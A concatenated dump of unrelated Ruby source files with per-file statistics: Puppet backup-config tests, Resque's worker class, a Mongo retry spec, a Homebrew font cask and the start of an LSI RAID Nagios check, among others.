:value => 'yes',
:match => [/CONFIG_mysql_dump_dbstatus='yes'/],
},
{
:title => 'should contain mysql_dump_create_database',
:attr => 'mysql_dump_create_database',
:value => 'yes',
:match => [/CONFIG_mysql_dump_create_database='yes'/],
},
{
:title => 'should contain mysql_dump_use_separate_dirs',
:attr => 'mysql_dump_use_separate_dirs',
:value => 'yes',
:match => [/CONFIG_mysql_dump_use_separate_dirs='yes'/],
},
{
:title => 'should contain mysql_dump_compression',
:attr => 'mysql_dump_compression',
:value => 'bzip2',
:match => [/CONFIG_mysql_dump_compression='bzip2'/],
},
{
:title => 'should contain mysql_dump_latest',
:attr => 'mysql_dump_latest',
:value => 'yes',
:match => [/CONFIG_mysql_dump_latest='yes'/],
},
{
:title => 'should contain mysql_dump_latest_clean_filenames',
:attr => 'mysql_dump_latest_clean_filenames',
:value => 'yes',
:match => [/CONFIG_mysql_dump_latest_clean_filenames='yes'/],
},
{
:title => 'should contain mysql_dump_differential',
:attr => 'mysql_dump_differential',
:value => 'yes',
:match => [/CONFIG_mysql_dump_differential='yes'/],
},
{
:title => 'should contain mailcontent',
:attr => 'mailcontent',
:value => 'nonegiven',
:match => [/CONFIG_mailcontent='nonegiven'/],
},
{
:title => 'should contain mail_maxattsize',
:attr => 'mail_maxattsize',
:value => '40',
:match => [/CONFIG_mail_maxattsize='40'/],
},
{
:title => 'should contain mail_splitandtar',
:attr => 'mail_splitandtar',
:value => 'no',
:match => [/CONFIG_mail_splitandtar='no'/],
},
{
:title => 'should contain mail_use_uuencoded_attachments',
:attr => 'mail_use_uuencoded_attachments',
:value => 'no',
:match => [/CONFIG_mail_use_uuencoded_attachments='no'/],
},
{
:title => 'should contain mail_address',
:attr => 'mail_address',
:value => '[email protected]',
:match => [/CONFIG_mail_address='[email protected]'/],
},
{
:title => 'should contain encrypt',
:attr => 'encrypt',
:value => 'yes',
:match => [/CONFIG_encrypt='yes'/],
},
{
:title => 'should contain encrypt_password',
:attr => 'encrypt_password',
:value => 'supersecret',
:match => [/CONFIG_encrypt_password='supersecret'/],
},
{
:title => 'should contain backup_local_files',
:attr => 'backup_local_files',
:value => ['/etc/motd','/etc/hosts'],
:match => [/CONFIG_backup_local_files=\( '\/etc\/motd' '\/etc\/hosts' \)/],
},
{
:title => 'should contain prebackup',
:attr => 'prebackup',
:value => '/usr/local/bin/myscript',
:match => [/CONFIG_prebackup='\/usr\/local\/bin\/myscript'/],
},
{
:title => 'should contain postbackup',
:attr => 'postbackup',
:value => '/usr/local/bin/myotherscript',
:match => [/CONFIG_postbackup='\/usr\/local\/bin\/myotherscript'/],
},
{
:title => 'should contain umask',
:attr => 'umask',
:value => '0020',
:match => [/CONFIG_umask='0020'/],
},
{
:title => 'should contain dryrun',
:attr => 'dryrun',
:value => 'no',
:match => [/CONFIG_dryrun='no'/],
}
].each do |param|
describe "when #{param[:attr]} is #{param[:value]}" do
let :params do default_params.merge({ param[:attr].to_sym => param[:value] }) end
it { should contain_file("#{params[:etc_dir]}/#{title}.conf").with_mode('0650') }
if param[:match]
it "#{param[:title]}: matches" do
param[:match].each do |match|
should contain_file("#{params[:etc_dir]}/#{title}.conf").with_content( match )
end
end
end
end
end
end
end
end | 34.652284 | 96 | 0.493591 |
38efe5b8fd55818cb6f72c30faf962d57e29bc48 | 341 | module Bankscrap
# Value object representing a bank investment position, populated by
# mass-assigning the attributes passed to the constructor.
class Investment
include Utils::Inspectable
attr_accessor :bank, :id, :name, :balance, :currency, :investment
# params - Hash whose keys match the attr_accessor names; each entry is
# assigned via its writer (unknown keys raise NoMethodError).
def initialize(params = {})
params.each { |key, value| send "#{key}=", value }
end
private
# Attributes shown by Utils::Inspectable (bank deliberately omitted to
# keep #inspect output compact).
def inspect_attributes
%i[id name balance currency investment]
end
end
end
| 18.944444 | 69 | 0.651026 |
7afe83dca293f96dba9a245abc9e2ccbef7b72d0 | 614 | require 'beaker/hypervisor/vagrant'
class Beaker::VagrantParallels < Beaker::Vagrant
# Provision with the Parallels provider by default; bare `super`
# forwards the provider argument to Beaker::Vagrant#provision.
def provision(provider = 'parallels')
super
end
# Builds the `v.vm.provider :parallels` stanza for the generated
# Vagrantfile. Guest-tools auto-update is disabled only when the host
# options explicitly request it via :prl_update_guest_tools == 'disable'.
def self.provider_vfile_section(host, options)
  stanza = [
    "  v.vm.provider :parallels do |prl|",
    "    prl.optimize_power_consumption = false",
    "    prl.memory = '#{memsize(host,options)}'",
  ]
  stanza << "    prl.update_guest_tools = false" if options[:prl_update_guest_tools] == 'disable'
  stanza << "  end"
  stanza.map { |line| "#{line}\n" }.join
end
end
| 32.315789 | 113 | 0.688925 |
e9110e6e72bbf6166bca2ce89d6717226a876e39 | 895 | # encoding: UTF-8
module Mutant
class Mutator
class Node
# Mutator for resbody nodes
# Mutator for resbody nodes (the `rescue Klass => e` clause of a
# begin/rescue). Children: exception capture list, the assignment
# target, and the handler body.
class Resbody < self
handle(:resbody)
children :captures, :assignment, :block
private
# Emit mutations
#
# Drops the assignment, mutates the handler body (if any), and mutates
# the capture list.
#
# @return [undefined]
#
# @api private
#
def dispatch
emit_assignment(nil)
emit_block_mutations if block
mutate_captures
end
# Mutate captures
#
# Emits a capture-less variant, then every non-empty subset of the
# original exception-class matchers.
#
# @return [undefined]
#
# @api private
#
def mutate_captures
return unless captures
emit_captures(nil)
Util::Array.each(captures.children, self) do |matchers|
next if matchers.empty?
emit_captures(s(:array, *matchers))
end
end
end # Resbody
end # Node
end # Mutator
end # Mutant
| 19.456522 | 65 | 0.52514 |
f7f907b04a3f1869d3d1066432810ed8ebe6dda2 | 977 | # frozen_string_literal: true
# rubocop:disable Metrics/LineLength
# == Schema Information
#
# Table name: taggings
#
# id :uuid not null, primary key
# created_at :datetime not null
# updated_at :datetime not null
# question_id :uuid not null
# tag_id(Can't set null false due to replication process) :uuid
#
# Indexes
#
# index_taggings_on_question_id (question_id)
# index_taggings_on_tag_id (tag_id)
#
# Foreign Keys
#
# taggings_question_id_fkey (question_id => questions.id) ON DELETE => restrict ON UPDATE => restrict
# taggings_tag_id_fkey (tag_id => tags.id) ON DELETE => restrict ON UPDATE => restrict
#
# rubocop:enable Metrics/LineLength
# Builds a Tagging join record linking a question to a tag; both
# associations are created through their own factories.
FactoryGirl.define do
  factory :tagging do
    question
    tag
  end
end
| 30.53125 | 103 | 0.559877 |
28ee92235357d13d5101e4e26ba47a38ce492d13 | 139 | class AddHideDefaultFieldsToSpaces < ActiveRecord::Migration
def change
add_column :spaces, :hide_default_fields, :boolean
end
end
| 23.166667 | 60 | 0.798561 |
eddd42ffcbac72546d98f22eaee5a6ed6fcff51b | 308 | cask 'font-nanummyeongjo-eco' do
version :latest
sha256 :no_check
url "http://appdown.naver.com/naver/font/NanumFont/setupmac/NanumFontSetup_MJECO_OTF_Ver1.0.app.zip"
name 'Nanummyeonjo Eco'
homepage 'https://hangeul.naver.com/2017/nanum'
app "NanumFontSetup_MJECO_OTF_Ver1.0.app"
end | 38.5 | 104 | 0.753247 |
d5aead7826ae80cad4635f42569eb39a97ff3495 | 16,042 | module Resque
  # A Resque Worker processes jobs. On platforms that support fork(2),
  # the worker will fork off a child to process each job. This ensures
  # a clean slate when beginning the next job and cuts down on gradual
  # memory growth as well as low level failures.
  #
  # It also ensures workers are always listening to signals from you,
  # their master, and can react accordingly.
  class Worker
    include Resque::Helpers
    extend Resque::Helpers

    # Whether the worker should log basic info to STDOUT
    attr_accessor :verbose

    # Whether the worker should log lots of info to STDOUT
    attr_accessor :very_verbose

    # Boolean indicating whether this worker can or can not fork.
    # Automatically set if a fork(2) fails.
    attr_accessor :cant_fork

    # Lets Worker.find stamp a reconstructed worker with its original id.
    attr_writer :to_s

    # Returns an array of all worker objects.
    #
    # Ids are read from the "workers" set in redis; any id that can no
    # longer be resolved (see Worker.find) is dropped by the compact.
    def self.all
      Array(redis.smembers(:workers)).map { |id| find(id) }.compact
    end

    # Returns an array of all worker objects currently processing
    # jobs.
    #
    # A worker counts as "working" when its "worker:<id>" key holds a
    # non-empty payload. The batched mapped_mget cannot be used against
    # Redis::Distributed (keys may live on different nodes), so we fall
    # back to one GET per worker in that case.
    def self.working
      names = all
      return [] unless names.any?
      names.map! { |name| "worker:#{name}" }
      reportedly_working = {}
      begin
        reportedly_working = redis.mapped_mget(*names).reject do |key, value|
          value.nil? || value.empty?
        end
      rescue Redis::Distributed::CannotDistribute
        names.each do |name|
          value = redis.get name
          reportedly_working[name] = value unless value.nil? || value.empty?
        end
      end
      reportedly_working.keys.map do |key|
        find key.sub("worker:", '')
      end.compact
    end

    # Returns a single worker object. Accepts a string id.
    # Returns nil when no worker with that id is registered.
    #
    # The queue list is recovered from the id itself: the segment after
    # the last colon, comma-separated.
    def self.find(worker_id)
      if exists? worker_id
        queues = worker_id.split(':')[-1].split(',')
        worker = new(*queues)
        worker.to_s = worker_id
        worker
      else
        nil
      end
    end

    # Alias of `find`
    def self.attach(worker_id)
      find(worker_id)
    end

    # Given a string worker id, return a boolean indicating whether the
    # worker exists
    def self.exists?(worker_id)
      redis.sismember(:workers, worker_id)
    end
# Workers should be initialized with an array of string queue
# names. The order is important: a Worker will check the first
# queue given for a job. If none is found, it will check the
# second queue name given. If a job is found, it will be
# processed. Upon completion, the Worker will again check the
# first queue given, and so forth. In this way the queue list
# passed to a Worker on startup defines the priorities of queues.
#
# If passed a single "*", this Worker will operate on all queues
# in alphabetical order. Queues can be dynamically added or
# removed without needing to restart workers using this method.
def initialize(*queues)
@queues = queues.map { |queue| queue.to_s.strip }
validate_queues
end
# A worker must be given a queue, otherwise it won't know what to
# do with itself.
#
# You probably never need to call this.
def validate_queues
if @queues.nil? || @queues.empty?
raise NoQueueError.new("Please give each worker at least one queue.")
end
end
# This is the main workhorse method. Called on a Worker instance,
# it begins the worker life cycle.
#
# The following events occur during a worker's life cycle:
#
# 1. Startup: Signals are registered, dead workers are pruned,
# and this worker is registered.
# 2. Work loop: Jobs are pulled from a queue and processed.
# 3. Teardown: This worker is unregistered.
#
# Can be passed a float representing the polling frequency.
# The default is 5 seconds, but for a semi-active site you may
# want to use a smaller value.
#
# Also accepts a block which will be passed the job as soon as it
# has completed processing. Useful for testing.
def work(interval = 5.0, &block)
interval = Float(interval)
$0 = "resque: Starting"
startup
loop do
break if shutdown?
if not paused? and job = reserve
log "got: #{job.inspect}"
job.worker = self
run_hook :before_fork, job
working_on job
if @child = fork
srand # Reseeding
procline "Forked #{@child} at #{Time.now.to_i}"
Process.wait(@child)
else
procline "Processing #{job.queue} since #{Time.now.to_i}"
perform(job, &block)
exit! unless @cant_fork
end
done_working
@child = nil
else
break if interval.zero?
log! "Sleeping for #{interval} seconds"
procline paused? ? "Paused" : "Waiting for #{@queues.join(',')}"
sleep interval
end
end
ensure
unregister_worker
end
# DEPRECATED. Processes a single job. If none is given, it will
# try to produce one. Usually run in the child.
def process(job = nil, &block)
return unless job ||= reserve
job.worker = self
working_on job
perform(job, &block)
ensure
done_working
end
# Processes a given job in the child.
def perform(job)
begin
run_hook :after_fork, job
job.perform
rescue Object => e
log "#{job.inspect} failed: #{e.inspect}"
begin
job.fail(e)
rescue Object => e
log "Received exception when reporting failure: #{e.inspect}"
end
failed!
else
log "done: #{job.inspect}"
ensure
yield job if block_given?
end
end
# Attempts to grab a job off one of the provided queues. Returns
# nil if no job can be found.
def reserve
queues.each do |queue|
log! "Checking #{queue}"
if job = Resque.reserve(queue)
log! "Found job on #{queue}"
return job
end
end
nil
rescue Exception => e
log "Error reserving job: #{e.inspect}"
log e.backtrace.join("\n")
raise e
end
# Returns a list of queues to use when searching for a job.
# A splat ("*") means you want every queue (in alpha order) - this
# can be useful for dynamically adding new queues.
def queues
@queues.map {|queue| queue == "*" ? Resque.queues.sort : queue }.flatten.uniq
end
# Not every platform supports fork. Here we do our magic to
# determine if yours does.
def fork
@cant_fork = true if $TESTING
return if @cant_fork
begin
# IronRuby doesn't support `Kernel.fork` yet
if Kernel.respond_to?(:fork)
Kernel.fork
else
raise NotImplementedError
end
rescue NotImplementedError
@cant_fork = true
nil
end
end
# Runs all the methods needed when a worker begins its lifecycle.
def startup
enable_gc_optimizations
register_signal_handlers
prune_dead_workers
run_hook :before_first_fork
register_worker
# Fix buffering so we can `rake resque:work > resque.log` and
# get output from the child in there.
$stdout.sync = true
end
# Enables GC Optimizations if you're running REE.
# http://www.rubyenterpriseedition.com/faq.html#adapt_apps_for_cow
def enable_gc_optimizations
if GC.respond_to?(:copy_on_write_friendly=)
GC.copy_on_write_friendly = true
end
end
# Registers the various signal handlers a worker responds to.
#
# TERM: Shutdown immediately, stop processing jobs.
# INT: Shutdown immediately, stop processing jobs.
# QUIT: Shutdown after the current job has finished processing.
# USR1: Kill the forked child immediately, continue processing jobs.
# USR2: Don't process any new jobs
# CONT: Start processing jobs again after a USR2
def register_signal_handlers
trap('TERM') { shutdown! }
trap('INT') { shutdown! }
begin
trap('QUIT') { shutdown }
trap('USR1') { kill_child }
trap('USR2') { pause_processing }
trap('CONT') { unpause_processing }
rescue ArgumentError
warn "Signals QUIT, USR1, USR2, and/or CONT not supported."
end
log! "Registered signals"
end
# Schedule this worker for shutdown. Will finish processing the
# current job.
def shutdown
log 'Exiting...'
@shutdown = true
end
# Kill the child and shutdown immediately.
def shutdown!
shutdown
kill_child
end
# Should this worker shutdown as soon as current job is finished?
def shutdown?
@shutdown
end
# Kills the forked child immediately, without remorse. The job it
# is processing will not be completed.
def kill_child
if @child
log! "Killing child at #{@child}"
if system("ps -o pid,state -p #{@child}")
Process.kill("KILL", @child) rescue nil
else
log! "Child #{@child} not found, restarting."
shutdown
end
end
end
# are we paused?
def paused?
@paused
end
# Stop processing jobs after the current one has completed (if we're
# currently running one).
def pause_processing
log "USR2 received; pausing job processing"
@paused = true
end
# Start processing jobs again after a pause
def unpause_processing
log "CONT received; resuming job processing"
@paused = false
end
# Looks for any workers which should be running on this server
# and, if they're not, removes them from Redis.
#
# This is a form of garbage collection. If a server is killed by a
# hard shutdown, power failure, or something else beyond our
# control, the Resque workers will not die gracefully and therefore
# will leave stale state information in Redis.
#
# By checking the current Redis state against the actual
# environment, we can determine if Redis is old and clean it up a bit.
def prune_dead_workers
all_workers = Worker.all
known_workers = worker_pids unless all_workers.empty?
all_workers.each do |worker|
host, pid, queues = worker.id.split(':')
next unless host == hostname
next if known_workers.include?(pid)
log! "Pruning dead worker: #{worker}"
worker.unregister_worker
end
end
# Registers ourself as a worker. Useful when entering the worker
# lifecycle on startup.
def register_worker
redis.sadd(:workers, self)
started!
end
# Runs a named hook, passing along any arguments.
def run_hook(name, *args)
return unless hook = Resque.send(name)
msg = "Running #{name} hook"
msg << " with #{args.inspect}" if args.any?
log msg
args.any? ? hook.call(*args) : hook.call
end
# Unregisters ourself as a worker. Useful when shutting down.
def unregister_worker
# Multiple workers on a single machine can fail a job, causing
# duplicate retries when using retry plugin. Here we're effectively
# synchronizing on the srem call to prevent that.
if redis.srem(:workers, self)
# If we're still processing a job, make sure it gets logged as a
# failure.
if (hash = processing) && !hash.empty?
job = Job.new(hash['queue'], hash['payload'])
# Ensure the proper worker is attached to this job, even if
# it's not the precise instance that died.
job.worker = self
job.fail(DirtyExit.new)
end
end
redis.del("worker:#{self}")
redis.del("worker:#{self}:started")
Stat.clear("processed:#{self}")
Stat.clear("failed:#{self}")
end
# Given a job, tells Redis we're working on it. Useful for seeing
# what workers are doing and when.
def working_on(job)
data = encode \
:queue => job.queue,
:run_at => Time.now.strftime("%Y/%m/%d %H:%M:%S %Z"),
:payload => job.payload
redis.set("worker:#{self}", data)
end
# Called when we are done working - clears our `working_on` state
# and tells Redis we processed a job.
def done_working
processed!
redis.del("worker:#{self}")
end
# How many jobs has this worker processed? Returns an int.
def processed
Stat["processed:#{self}"]
end
# Tell Redis we've processed a job.
def processed!
Stat << "processed"
Stat << "processed:#{self}"
end
# How many failed jobs has this worker seen? Returns an int.
def failed
Stat["failed:#{self}"]
end
# Tells Redis we've failed a job.
def failed!
Stat << "failed"
Stat << "failed:#{self}"
end
# What time did this worker start? Returns an instance of `Time`
def started
redis.get "worker:#{self}:started"
end
# Tell Redis we've started
def started!
redis.set("worker:#{self}:started", Time.now.to_s)
end
# Returns a hash explaining the Job we're currently processing, if any.
def job
decode(redis.get("worker:#{self}")) || {}
end
alias_method :processing, :job
# Boolean - true if working, false if not
def working?
state == :working
end
# Boolean - true if idle, false if not
def idle?
state == :idle
end
# Returns a symbol representing the current worker state,
# which can be either :working or :idle
def state
redis.exists("worker:#{self}") ? :working : :idle
end
# Is this worker the same as another worker?
def ==(other)
to_s == other.to_s
end
def inspect
"#<Worker #{to_s}>"
end
# The string representation is the same as the id for this worker
# instance. Can be used with `Worker.find`.
def to_s
@to_s ||= "#{hostname}:#{Process.pid}:#{@queues.join(',')}"
end
alias_method :id, :to_s
    # chomp'd hostname of this machine
    def hostname
      @hostname ||= `hostname`.chomp
    end

    # Returns Integer PID of running worker
    def pid
      Process.pid
    end

    # Returns an Array of string pids of all the other workers on this
    # machine. Useful when pruning dead workers on startup.
    def worker_pids
      if RUBY_PLATFORM =~ /solaris/
        solaris_worker_pids
      else
        linux_worker_pids
      end
    end

    # Find Resque worker pids on Linux and OS X.
    #
    # Returns an Array of string pids of all the other workers on this
    # machine. Useful when pruning dead workers on startup.
    def linux_worker_pids
      `ps -A -o pid,command | grep "[r]esque" | grep -v "resque-web"`.split("\n").map do |line|
        line.split(' ')[0]
      end
    end

    # Find Resque worker pids on Solaris.
    #
    # Returns an Array of string pids of all the other workers on this
    # machine. Useful when pruning dead workers on startup.
    #
    # Solaris ps truncates the command column, so each candidate ruby
    # process is inspected with pargs to confirm it runs this resque
    # version (the procline set in #procline).
    def solaris_worker_pids
      `ps -A -o pid,comm | grep "[r]uby" | grep -v "resque-web"`.split("\n").map do |line|
        real_pid = line.split(' ')[0]
        pargs_command = `pargs -a #{real_pid} 2>/dev/null | grep [r]esque | grep -v "resque-web"`
        if pargs_command.split(':')[1] == " resque-#{Resque::Version}"
          real_pid
        end
      end.compact
    end

    # Given a string, sets the procline ($0) and logs.
    # Procline is always in the format of:
    # resque-VERSION: STRING
    def procline(string)
      $0 = "resque-#{Resque::Version}: #{string}"
      log! $0
    end

    # Log a message to STDOUT if we are verbose or very_verbose.
    def log(message)
      if verbose
        puts "*** #{message}"
      elsif very_verbose
        time = Time.now.strftime('%H:%M:%S %Y-%m-%d')
        puts "** [#{time}] #$$: #{message}"
      end
    end

    # Logs a very verbose message to STDOUT.
    def log!(message)
      log message if very_verbose
    end
  end
end
| 29.167273 | 97 | 0.618751 |
1d60e68c3073c4db6179fcd4cccf9abb65ad162c | 1,333 | {
matrix_id: '1832',
name: 'scrs8-2b',
group: 'Meszaros',
description: 'LP sequence: scrs8-2b-4, 16, 64',
author: '',
editor: 'C. Meszaros',
date: '2004',
kind: 'linear programming problem sequence',
problem_2D_or_3D: '0',
num_rows: '1820',
num_cols: '3499',
nonzeros: '7367',
num_explicit_zeros: '0',
num_strongly_connected_components: '1',
num_dmperm_blocks: '262',
structural_full_rank: 'true',
structural_rank: '1820',
pattern_symmetry: '0.000',
numeric_symmetry: '0.000',
rb_type: 'real',
structure: 'rectangular',
cholesky_candidate: 'no',
positive_definite: 'no',
notes: 'http://www.sztaki.hu/~meszaros/public_ftp/lptestset
Converted to standard form via Resende and Veiga\'s mpsrd:
minimize c\'*x, subject to A*x=b and lo <= x <= hi
Determinisitic equivalent of stochastic LP
',
aux_fields: 'A: cell 3-by-1
b: cell 3-by-1
c: cell 3-by-1
lo: cell 3-by-1
hi: cell 3-by-1
z0: cell 3-by-1
', norm: '4.305276e+01',
min_singular_value: '5.907520e-03',
condition_number: '7.287789e+03',
svd_rank: '1820',
sprank_minus_rank: '0',
null_space_dimension: '0',
full_numerical_rank: 'yes',
image_files: 'scrs8-2b.png,scrs8-2b_dmperm.png,scrs8-2b_svd.png,scrs8-2b_graph.gif,',
}
| 29.622222 | 89 | 0.63916 |
085e98c76e424b58730facc480ba23e09da643c9 | 57 | require "spec_helper"
# Placeholder spec file — no examples have been written yet.
describe 'test template' do
end
| 8.142857 | 27 | 0.754386 |
5d51a65a297925fee3d4614dbf05613c95316d84 | 6,452 | require 'spec_helper'
describe Mongo::Retryable do
let(:klass) do
Class.new do
include Mongo::Retryable
attr_reader :cluster
attr_reader :operation
def initialize(operation, cluster)
@operation = operation
@cluster = cluster
end
def max_read_retries
cluster.max_read_retries
end
def read_retry_interval
cluster.read_retry_interval
end
def read
read_with_retry do
operation.execute
end
end
def write
write_with_retry(nil, nil) do
operation.execute
end
end
end
end
let(:operation) do
double('operation')
end
let(:cluster) do
double('cluster', next_primary: server_selector)
end
let(:server_selector) do
double('server_selector', select_server: double('server'))
end
let(:retryable) do
klass.new(operation, cluster)
end
describe '#read_with_retry' do
context 'when no exception occurs' do
before do
expect(operation).to receive(:execute).and_return(true)
end
it 'executes the operation once' do
expect(retryable.read).to be true
end
end
context 'when a socket error occurs' do
before do
expect(operation).to receive(:execute).and_raise(Mongo::Error::SocketError).ordered
expect(cluster).to receive(:max_read_retries).and_return(1).ordered
expect(cluster).to receive(:scan!).and_return(true).ordered
expect(operation).to receive(:execute).and_return(true).ordered
end
it 'executes the operation twice' do
expect(retryable.read).to be true
end
end
context 'when a socket timeout error occurs' do
before do
expect(operation).to receive(:execute).and_raise(Mongo::Error::SocketTimeoutError).ordered
expect(cluster).to receive(:max_read_retries).and_return(1).ordered
expect(cluster).to receive(:scan!).and_return(true).ordered
expect(operation).to receive(:execute).and_return(true).ordered
end
it 'executes the operation twice' do
expect(retryable.read).to be true
end
end
context 'when an operation failure occurs' do
context 'when the cluster is not a mongos' do
before do
expect(operation).to receive(:execute).and_raise(Mongo::Error::OperationFailure).ordered
expect(cluster).to receive(:sharded?).and_return(false)
end
it 'raises an exception' do
expect {
retryable.read
}.to raise_error(Mongo::Error::OperationFailure)
end
end
context 'when the cluster is a mongos' do
context 'when the operation failure is not retryable' do
let(:error) do
Mongo::Error::OperationFailure.new('not authorized')
end
before do
expect(operation).to receive(:execute).and_raise(error).ordered
expect(cluster).to receive(:sharded?).and_return(true)
end
it 'raises the exception' do
expect {
retryable.read
}.to raise_error(Mongo::Error::OperationFailure)
end
end
context 'when the operation failure is retryable' do
let(:error) do
Mongo::Error::OperationFailure.new('no master')
end
context 'when the retry succeeds' do
before do
expect(operation).to receive(:execute).and_raise(error).ordered
expect(cluster).to receive(:sharded?).and_return(true)
expect(cluster).to receive(:max_read_retries).and_return(1).ordered
expect(cluster).to receive(:read_retry_interval).and_return(0.1).ordered
expect(operation).to receive(:execute).and_return(true).ordered
end
it 'returns the result' do
expect(retryable.read).to be true
end
end
context 'when the retry fails once and then succeeds' do
before do
expect(operation).to receive(:execute).and_raise(error).ordered
expect(cluster).to receive(:sharded?).and_return(true)
expect(cluster).to receive(:max_read_retries).and_return(2).ordered
expect(cluster).to receive(:read_retry_interval).and_return(0.1).ordered
expect(operation).to receive(:execute).and_raise(error).ordered
expect(cluster).to receive(:sharded?).and_return(true)
expect(cluster).to receive(:max_read_retries).and_return(2).ordered
expect(cluster).to receive(:read_retry_interval).and_return(0.1).ordered
expect(operation).to receive(:execute).and_return(true).ordered
end
it 'returns the result' do
expect(retryable.read).to be true
end
end
end
end
end
end
describe '#write_with_retry' do
context 'when no exception occurs' do
before do
expect(operation).to receive(:execute).and_return(true)
end
it 'executes the operation once' do
expect(retryable.write).to be true
end
end
context 'when a not master error occurs' do
before do
expect(operation).to receive(:execute).and_raise(Mongo::Error::OperationFailure.new('not master')).ordered
expect(cluster).to receive(:scan!).and_return(true).ordered
expect(operation).to receive(:execute).and_return(true).ordered
end
it 'executes the operation twice' do
expect(retryable.write).to be true
end
end
context 'when a not primary error occurs' do
before do
expect(operation).to receive(:execute).and_raise(Mongo::Error::OperationFailure.new('Not primary')).ordered
expect(cluster).to receive(:scan!).and_return(true).ordered
expect(operation).to receive(:execute).and_return(true).ordered
end
it 'executes the operation twice' do
expect(retryable.write).to be true
end
end
context 'when a normal operation failure occurs' do
before do
expect(operation).to receive(:execute).and_raise(Mongo::Error::OperationFailure).ordered
end
it 'raises an exception' do
expect {
retryable.write
}.to raise_error(Mongo::Error::OperationFailure)
end
end
end
end
| 28.052174 | 115 | 0.628642 |
331c160b3fa49bd93a98f1382db140f32508b76f | 8,043 | require 'senedsa'
module Elesai; module Action
class Check
DEFAULT_SENEDSA_CONFIG_FILE = File.join(ENV['HOME'],"/.senedsa/config")
include Senedsa
def initialize(arguments,options)
@options = options.merge!({ :monitor => :nagios, :mode => :active, :diskcachepolicy => nil })
@arguments = []
@lsi = nil
opts = OptionParser.new
opts.banner = "Usage: #{ID} [options] check [check_options]"
opts.separator ""
opts.separator "Check Options"
opts.on('--hotspare MIN', Integer, "Minimum number of hotspares") { |o| @options[:hotspare] = o }
opts.on('--diskcachepolicy DISKCACHEPOLICY', String, "Disk cache policy/Disk Write Cache checks") { |o| @options[:diskcachepolicy] = o }
opts.on('-M', '--monitor [nagios]', [:nagios], "Monitoring system") { |o| @options[:monitor] = o }
opts.on('-m', '--mode [active|passive]', [:active, :passive], "Monitoring mode") { |o| @options[:mode] = o }
opts.on('-H', '--nsca_hostname HOSTNAME', String, "NSCA hostname to send passive checks") { |o| @options[:nsca_hostame] = o }
opts.on('-c', '--config CONFIG', String, "Path to Senedsa (send_nsca) configuration" ) { |o| @options[:senedsa_config] = o }
opts.on('-S', '--svc_descr SVC_DESR', String, "Nagios service description") { |o| @options[:svc_descr] = o }
opts.order!(arguments)
options_valid?
end
def exec
@lsi = LSI.new(:megacli => @options[:megacli], :fake => @options[:fake])
plugin_output = ""
plugin_status = ""
hotspare = 0
@lsi.physicaldrives.each do |id,physicaldrive|
drive_plugin_string = "[PD:#{physicaldrive._id}:#{physicaldrive[:size]}:#{physicaldrive[:mediatype]}:#{physicaldrive[:pdtype]}]"
unless physicaldrive[:firmwarestate].state == :online or physicaldrive[:firmwarestate].state == :hotspare
plugin_output += " #{drive_plugin_string}:#{physicaldrive[:firmwarestate].state}"
plugin_status = :critical if physicaldrive[:firmwarestate].state == :failed
plugin_status = :warning if physicaldrive[:firmwarestate].state == :rebuild and plugin_status != :critical
end
unless physicaldrive[:mediaerrorcount].to_i < 10
plugin_output += " #{drive_plugin_string}:MediaError:#{physicaldrive[:mediaerrorcount]}"
plugin_status = :warning if plugin_status.empty?
end
unless physicaldrive[:predictivefailurecount].to_i < 5
plugin_output += " #{drive_plugin_string}:PredictiveFailure:#{physicaldrive[:predictivefailurecount]}"
plugin_status = :warning if plugin_status.empty?
end
hotspare += 1 if physicaldrive[:firmwarestate].state == :hotspare
end
if hotspare < @options[:hotspare].to_i
plugin_status = :warning unless plugin_status == :critical
plugin_output += " hotspare low watermark (require #{@options[:hotspare]}, have #{hotspare})"
end
@lsi.virtualdrives.each do |vd|
vd_plugin_string = "[VD:#{vd._id}]"
if @options[:diskcachepolicy] and vd[:diskcachepolicy] != @options[:diskcachepolicy]
plugin_output += " #{vd_plugin_string}:diskcachepolicy is not #{@options[:diskcachepolicy]}"
plugin_status = :warning
end
case vd[:state]
when :offline, :failed
plugin_output += " #{vd_plugin_string}:#{vd[:state]}"
plugin_status = :critical
when :partially_degraded, :degraded
plugin_output += " #{vd_plugin_string}:#{vd[:state]}"
plugin_status = :warning if plugin_status != :critical
when :optimal
a = 1
else
plugin_status = :unknown
plugin_output += " #{vd_plugin_string}:#{vd[:state]}"
end
unless vd[:currentcachepolicy] =~ /^WriteBack/ and @lsi.bbus[0][:firmwarestatus][:learncycleactive] != 'Yes'
plugin_status = :warning
plugin_output += " #{vd_plugin_string}:(not in writeback mode)"
end
end
@lsi.bbus.each do |bbu|
unless bbu[:firmwarestatus][:temperature] == 'OK'
plugin_output += " [BBU:#{bbu._id}:temperature:#{bbu[:firmwarestatus][:temperature]}:#{bbu[:temperature].gsub(/\s/,'')}]"
end
unless bbu[:firmwarestatus][:learncyclestatus] == 'OK'
plugin_output += " [BBU:#{bbu._id}:learncyclestatus:#{bbu[:firmwarestatus][:learncyclestatus]}]"
plugin_status = :warning if plugin_status == ""
end
[:batterypackmissing, :batteryreplacementrequired].each do |attr|
unless bbu[:firmwarestatus][attr] == 'No'
plugin_output += " [BBU:#{attr}:#{bbu[:firmwarestatus][attr]}]"
plugin_status = :warning if plugin_status == ""
end
end
if bbu[:batterytype] == 'iBBU'
if bbu[:batterystate] != 'Operational'
plugin_output += " [BBU:#{bbu._id}:batterystate:#{bbu[:batterystate]}]"
plugin_status = :warning
else
if bbu[:firmwarestatus][:learncycleactive] == 'Yes'
plugin_output += " learn cycle enabled: [BBU:absolutestateofcharge:#{bbu[:gasgaugestatus][:absolutestateofcharge]}]"
else
unless bbu[:firmwarestatus][:voltage] == 'OK'
plugin_output += " [BBU:#{bbu._id}:voltage:#{bbu[:firmwarestatus][:voltage]}]"
plugin_status = :warning if plugin_status == ''
end
remainingcapacity = bbu[:capacityinfo][:remainingcapacity].number
designcapacity = bbu[:designinfo][:designcapacity].number
bbupercent = (remainingcapacity.to_f / designcapacity.to_f) * 100
if bbupercent < 70
plugin_output += " [BBU: #{bbupercent.to_i} percent of original capacity remaining]"
plugin_status = :warning if plugin_status == ''
end
end
end
end
end
if plugin_output.empty? and plugin_status.empty?
if @lsi.adapters.empty?
plugin_status = :warning
plugin_output = 'no adapters found'
else
@lsi.adapters.each do |adapter|
plugin_output += " [#{adapter._id}: #{adapter[:versions][:productname].gsub(/\s+/,'_')} OK]"
end
end
end
plugin_status = :ok if plugin_status.empty?
case @options[:monitor]
when :nagios
case @options[:mode]
when :active
puts "#{plugin_status.to_s.upcase}:#{plugin_output}"
exit SendNsca::STATUS[plugin_status]
when :passive
